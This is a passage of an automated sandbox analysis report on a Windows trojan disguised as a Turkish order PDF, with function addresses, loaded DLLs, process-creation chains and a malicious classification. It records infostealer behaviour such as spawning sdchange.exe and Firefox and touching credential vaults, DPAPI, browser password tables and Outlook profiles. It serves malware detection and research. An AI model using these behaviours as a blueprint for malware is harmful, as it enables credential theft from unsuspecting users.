Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E003E6 4_2_32E003E6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4E3F0 4_2_32D4E3F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D8739A 4_2_32D8739A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFA352 4_2_32DFA352
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2D34C 4_2_32D2D34C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF132D 4_2_32DF132D
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEF0CC 4_2_32DEF0CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D470C0 4_2_32D470C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF70E9 4_2_32DF70E9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFF0E0 4_2_32DFF0E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF81CC 4_2_32DF81CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E001AA 4_2_32E001AA
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4B1B0 4_2_32D4B1B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0B16B 4_2_32E0B16B
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D2F172 4_2_32D2F172
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D7516C 4_2_32D7516C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDA118 4_2_32DDA118
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30100 4_2_32D30100
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF16CC 4_2_32DF16CC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5C6E0 4_2_32D5C6E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3C7C0 4_2_32D3C7C0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFF7B0 4_2_32DFF7B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D64750 4_2_32D64750
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40770 4_2_32D40770
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEE4F6 4_2_32DEE4F6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF2446 4_2_32DF2446
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D31460 4_2_32D31460
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFF43F 4_2_32DFF43F
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDD5B0 4_2_32DDD5B0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E00591 4_2_32E00591
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF7571 4_2_32DF7571
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40535 4_2_32D40535
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DEDAC6 4_2_32DEDAC6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3EA80 4_2_32D3EA80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DDDAAC 4_2_32DDDAAC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D85AA0 4_2_32D85AA0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFFA49 4_2_32DFFA49
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF7A46 4_2_32DF7A46
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB3A6C 4_2_32DB3A6C
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF6BD7 4_2_32DF6BD7
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D7DBF9 4_2_32D7DBF9
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5FB80 4_2_32D5FB80
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFAB40 4_2_32DFAB40
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFFB76 4_2_32DFFB76
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D6E8F0 4_2_32D6E8F0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D438E0 4_2_32D438E0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D268B8 4_2_32D268B8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D42840 4_2_32D42840
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4A840 4_2_32D4A840
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32E0A9A6 4_2_32E0A9A6
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D429A0 4_2_32D429A0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D49950 4_2_32D49950
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5B950 4_2_32D5B950
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D56962 4_2_32D56962
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFEEDB 4_2_32DFEEDB
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D52E90 4_2_32D52E90
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFCE93 4_2_32DFCE93
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D49EB0 4_2_32D49EB0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40E59 4_2_32D40E59
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFEE26 4_2_32DFEE26
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D32FC8 4_2_32D32FC8
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4CFE0 4_2_32D4CFE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D41F92 4_2_32D41F92
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFFFB1 4_2_32DFFFB1
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB4F40 4_2_32DB4F40
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFFF09 4_2_32DFFF09
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D60F30 4_2_32D60F30
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D82F28 4_2_32D82F28
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D30CF2 4_2_32D30CF2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DFFCF2 4_2_32DFFCF2
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DE0CB5 4_2_32DE0CB5
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D40C00 4_2_32D40C00
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DB9C32 4_2_32DB9C32
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D5FDC0 4_2_32D5FDC0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D3ADE0 4_2_32D3ADE0
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D58DBF 4_2_32D58DBF
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF1D5A 4_2_32DF1D5A
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D43D40 4_2_32D43D40
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32DF7D73 4_2_32DF7D73
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 4_2_32D4AD00 4_2_32D4AD00
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: String function: 32DAEA12 appears 84 times
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: String function: 32D2B970 appears 266 times
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: String function: 32D87E54 appears 87 times
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: String function: 32D75130 appears 36 times
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: String function: 32DBF290 appears 105 times
Sample file is different than original file name gathered from version info
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000002.2633223888.0000000032FD1000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2506460914.0000000032C84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2504045336.0000000032AC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesdchange.exej% vs S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe
Uses 32bit PE files
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/10@3/3
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403359
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_004046EC GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004046EC
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Code function: 0_2_00402104 CoCreateInstance, 0_2_00402104
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File created: C:\Users\user\AppData\Local\Temp\nsn8FD7.tmp Jump to behavior
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: sdchange.exe, 00000007.00000003.2810505866.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000003.2806166818.0000000000905000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000007.00000002.2936326745.0000000000905000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Virustotal: Detection: 15%
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File read: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe"
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe"
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Process created: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe "C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe" Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Process created: C:\Windows\SysWOW64\sdchange.exe "C:\Windows\SysWOW64\sdchange.exe" Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\ozObaRMfFumKTnOmrEagnJLnBDKeXBGEgZVLimeITxshNaSucROpJhI\cXGDMXIloFhOE.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe File written: C:\Windows\Resources\0809\mysterist.ini Jump to behavior
Source: C:\Windows\SysWOW64\sdchange.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sdchange.pdbGCTL source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567118439.0000000002DB7000.00000004.00000020.00020000.00000000.sdmp, S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000003.2567064883.0000000002DAE000.00000004.00000020.00020000.00000000.sdmp, cXGDMXIloFhOE.exe, 00000006.00000002.2936496818.0000000000728000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: S#U0130PAR#U0130#U015e No.112024-pdf.bat.exe, 00000004.00000001.2268563953.0000000000649000.00000008.00000001.01000000.00000009.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: cXGDMXIloFhOE.exe, 00000006.00000002.2936926532.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp, cXGDMXIloFhOE.exe, 00000008.00000000.2687039028.0000000000EEE000.00000002.00000001.01000000.0000000A.sdmp
